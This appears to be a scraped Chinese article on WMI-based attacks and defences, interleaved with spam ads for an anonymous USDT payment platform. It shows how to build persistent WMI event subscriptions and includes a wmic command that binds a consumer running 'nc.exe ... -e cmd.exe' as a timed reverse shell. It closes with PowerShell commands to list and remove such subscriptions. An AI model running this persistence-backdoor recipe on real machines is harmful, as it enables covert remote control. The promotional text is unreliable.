欢迎访问本站!

首页科技正文

usdt充值(www.caibao.it):WMI攻击与平安防御

admin2021-02-2769资讯

USDT第三方支付

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

WMI是一项Windows治理手艺,其全称是Windows Management Instrumentation,即Windows治理规范。大多数基于Windows的软件依赖于此服务。因此有些黑客会针对WMI举行攻击。本文先容了 WMI 的攻击和平安防御方式,以供人人交流讨论。

每个WMI工具都是代表着获取种种操作系统信息与举行相关操作的类实例,以ROOT\CIMV2作为默认的命名空间,CIM为数据库,并以WQL 查询语句用于查询 WMI 工具实例、类和命名空间。

WMI的主要交互方式

Powershell (Get-WmiObject、Set-WmiInstance、Invoke-WmiMethod 等)

例如:Get-WmiObject -Namespace “ROOT” -Class __NAMESPACE

Wmic

例如:wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_OperatingSystem

WMI事宜

WMI事宜会建立一个查询请求,请求中界说了我们需要执行的操作,一旦事宜发生就会执行我们界说的操作,支持两种事宜。

01暂且事宜:要建立事宜的历程处于流动状态,暂且事宜就会被激活(以当前权限运行)。

例如:

每打开一个新历程就会输出历程名称:

02持久事宜:事宜存储在CIM数据库中,并且会一直处于流动状态,直到从数据库中删除(以system权限运行,且重启保持稳定)。

持久事宜与后门

行使持久事宜来做后门(建立需要治理员权限)需要三个部门。

1、事宜过滤器(Filter):用来界说触发的条件,包罗系统启动、特定程序执行、特准时间距离等,存储在ROOT\subscription的实例__ EventFilter工具中,多数事宜使用WQL WITHIN子句指定轮询距离。

2、事宜消费者(Consumer):用来指定要执行的具体操作,包罗执行下令(CommandLineEventConsumer)、运行剧本(ActiveScriptEventConsumer)、添加日志条目(NTEventLogEventConsumer)或者发送邮件( *** TPEventConsumer)。

3、绑定机制:将过滤器绑定到消费者(FilterToConsumerBinding类)

后门实例

,

usdt支付接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,

不管是 powershell , wmic 照样 mof 文件,都由三个部门组成。

01Powershell 实现

效果:每60秒运行一次powershell 下令。

02 Wmic实现

WHERE Targetlnstance ISA ‘Win32_PerFormattedData_PerfOS_System
 
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="Consumertest", ExecutablePath="C:\Users\admin\Desktop\nc.exe",CommandLineTemplate="C:\Users\admin\Desktop\nc.exe 127.0.0.1 443 -e c:\windows\system32\cmd.exe"
 
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"Filtertest\"", Consumer="CommandLineEventConsumer.Name=\"Consumertest\""

效果:准时触发反弹。

现如今,WMI攻击在许多APT行为中也经常被行使:

03 Mof 实现

执行下令:

Mofcomp xx.mof

效果:每30分钟触发反弹。

也可以直接执行vbs剧本文件:

instance of ActiveScriptEventConsumer as $Cons
{
    Name = "ASEC";
    ScriptingEngine = "VBScript";
    ScriptFileName = "c:\\asec.vbs";
};

平安防御

查看:

,List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
 
,List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
 
,List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

删除:

,Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
 
,Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
 
,Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose


网友评论